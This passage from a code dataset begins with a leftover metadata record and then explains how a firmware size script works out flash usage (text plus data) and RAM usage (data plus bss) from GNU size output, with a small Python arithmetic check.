'paid_by']","sub_path":"maintenance/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
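A closing note on the get_sizes.py record earlier in this section: GNU size prints text/data/bss per ELF, and the script's index arithmetic encodes the usual embedded-firmware accounting, flash image = text + data (code plus the load image of the initialised data) and runtime RAM = data + bss. A toy check of that arithmetic (section sizes are made up):

# Hypothetical section sizes as `size` would report them.
text, data, bss = 180224, 2048, 14336
print('flash:', text + data)  # 182272 bytes programmed into flash
print('ram:  ', data + bss)   # 16384 bytes of SRAM occupied at runtime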